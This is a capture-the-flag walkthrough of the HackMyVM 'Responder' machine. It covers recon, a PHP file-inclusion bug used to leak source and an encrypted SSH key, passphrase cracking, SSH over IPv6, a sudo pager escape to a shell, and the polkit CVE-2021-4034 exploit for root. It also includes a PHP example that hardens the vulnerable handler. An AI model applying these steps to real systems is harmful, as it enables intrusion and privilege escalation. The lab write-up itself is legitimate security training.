HackMyVm Responder Walkthrough

Scan the ports and notice that port 22 is filtered.

 nmap -sV -sC -oN port.log
 Nmap scan report for darkmatter.hmv (
 Host is up (0.12s latency).
 Not shown: 998 closed tcp ports (conn-refused)
 22/tcp filtered ssh
 80/tcp open     http    Apache httpd 2.4.38 ((Debian))
 |_http-title: Site doesn't have a title (text/html; charset=UTF-8).
 |_http-server-header: Apache/2.4.38 (Debian)

Check port 80: there is only a simple page that tells the current time.

 ~/D/responder $curl                                              
 your answer is in the answer.. it's
 and your time is running out..

Directory-scan port 80 and find filemanager.php. The thread count cannot be too high; I set it to 20.

 ~/D/responder $gobuster dir -u -t 20 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .html,.php,.txt -b 401,403,404,500 --wildcard -o 80.log
 /index.php            (Status: 200) [Size: 73]
 /filemanager.php      (Status: 302) [Size: 0] [--> /]

Fuzz the parameter name of filemanager.php; the hit is "random".

 ~/D/responder $wfuzz -u ""  -w /usr/share/seclists/Discovery/Web-Content/common.txt --hh 0
 ID           Response   Lines    Word       Chars       Payload                
 000003395:   302        27 L     39 W       1430 Ch     "random"

LFI works: read /etc/passwd and get two user names.

 ~/D/responder $curl ""         

After enumerating some Linux files, we cannot get a shell through the log files. So dump the source code of filemanager.php (base64-encoded, decoded with base64 -d) and find an encrypted SSH key in it.

 ~/D/responder $curl "
 code/resource=filemanager.php" |base64 -d                                                
     $filename = $_GET['random'];
 Proc-Type: 4,ENCRYPTED
 DEK-Info: DES-EDE3-CBC,411124D3C302D4F4
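
The line $filename = $_GET['random']; above is the whole bug: whatever the request names is handed to the file operation unchecked, which is why /etc/passwd and the script's own source were readable. As an added example, not the VM's own code, here is how such a handler can be hardened in PHP; FILE_BASE, safeFilePath() and the use of readfile() are assumptions about the intended design, not anything the box actually does.

```php
<?php
// Added hardening example (assumed design, not the box's filemanager.php).
// Vulnerable pattern from the page: $filename = $_GET['random']; used directly.
declare(strict_types=1);

// Only files under this directory may ever be served (assumed location).
const FILE_BASE = '/var/www/html/files';

// Return the canonical path of a file inside $base, or null if the request
// names anything else (traversal, wrappers such as php://, symlinks out).
function safeFilePath(string $base, string $userInput): ?string
{
    // Plain file names only: no separators, no scheme prefix, no '..'.
    if ($userInput === ''
        || !preg_match('/^[A-Za-z0-9._-]+$/', $userInput)
        || strpos($userInput, '..') !== false) {
        return null;
    }
    $realBase  = realpath($base);
    $candidate = realpath($base . DIRECTORY_SEPARATOR . $userInput);
    if ($realBase === false || $candidate === false) {
        return null;
    }
    // The canonical path must start with the canonical base plus a separator;
    // this also defeats symlinks pointing outside and prefix tricks such as
    // /var/www/html/files_evil.
    $prefix = $realBase . DIRECTORY_SEPARATOR;
    if (strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return is_file($candidate) ? $candidate : null;
}

$path = safeFilePath(FILE_BASE, (string) ($_GET['random'] ?? ''));
if ($path === null) {
    http_response_code(404);
    exit('not found');
}
// Serve the bytes; never include() a user-selected file.
header('Content-Type: application/octet-stream');
readfile($path);
```

With this check in place, the php://filter and /etc/passwd requests shown in the walkthrough all fail the allow-list and prefix test and return 404.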

Crack the passphrase of the SSH key with john.

 ~/D/responder $/usr/share/john/ssh2john.py id_rsa > hash.txt                     
 ~/D/responder $john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt        
 Press 'q' or Ctrl-C to abort, almost any other key for status
 xxxxxx          (id_rsa)

Now we have the user name, the SSH key and its passphrase to connect to port 22, but port 22 is filtered over IPv4. Maybe it is reachable over IPv6.

Find the machine's IPv6 link-local address by pinging the all-nodes multicast address ff02::1 on eth1.

 ~/D/responder $ping6 -c2 -n -I eth1 ff02::1                                    
 ping6: Warning: source address might be selected on device other than: eth1
 PING ff02::1(ff02::1) from :: eth1: 56 data bytes
 64 bytes from fe80::a00:27ff:fec2:1426%eth1: icmp_seq=1 ttl=64 time=4.76 ms

Check port 22 over IPv6; it is open.

 ~/D/responder $nmap -6 -p22 fe80::a00:27ff:fec2:1426%eth1    
 Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-05 08:59 CST
 Nmap scan report for fe80::a00:27ff:fec2:1426
 Host is up (0.0097s latency).
 22/tcp open  ssh

Log in over SSH as user elliot.

 ~/D/responder $ssh elliot@fe80::a00:27ff:fec2:1426%eth1 -i id_rsa -6    
 Enter passphrase for key 'id_rsa':
 Linux responder 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64
 elliot@responder:~$ id
 uid=1001(elliot) gid=1001(elliot) groups=1001(elliot)

Check sudo -l.

 elliot@responder:~$ sudo -l
 sudo: unable to resolve host responder: Temporary failure in name resolution
 Matching Defaults entries for elliot on responder:
     env_reset, mail_badpass,
 User elliot may run the following commands on responder:
     (rohit) NOPASSWD: /usr/bin/calc

Run calc as rohit, open the help page (it is shown in a pager), and type "!/bin/bash" after the ":" prompt to get a shell as rohit.

 elliot@responder:~$ sudo -u rohit /usr/bin/calc
 sudo: unable to resolve host responder: Temporary failure in name resolution
 C-style arbitrary precision calculator (version
 Calc is open software. For license details type:  help copyright
 [Type "exit" to exit, or "help" for help.]
 ; help
 For more information while running calc, type  help  followed by one of the
 following topics:
     topic               description
     -----               -----------
     intro               introduction to calc
     overview            overview of calc
     help                this file
 rohit@responder:/home/elliot$ id
 uid=1002(rohit) gid=1002(rohit) groups=1002(rohit)

Check SUID files and notice polkit.

 elliot@responder:~$ find / -perm -u=s 2>/dev/null

Use the recent polkit CVE (CVE-2021-4034) to get root.

 elliot@responder:/tmp$ gcc cve-2021-4034-poc.c -o cve-2021-4034-poc
 elliot@responder:/tmp$ ./cve-2021-4034-poc
 # id
 uid=0(root) gid=0(root) groups=0(root),1001(elliot)
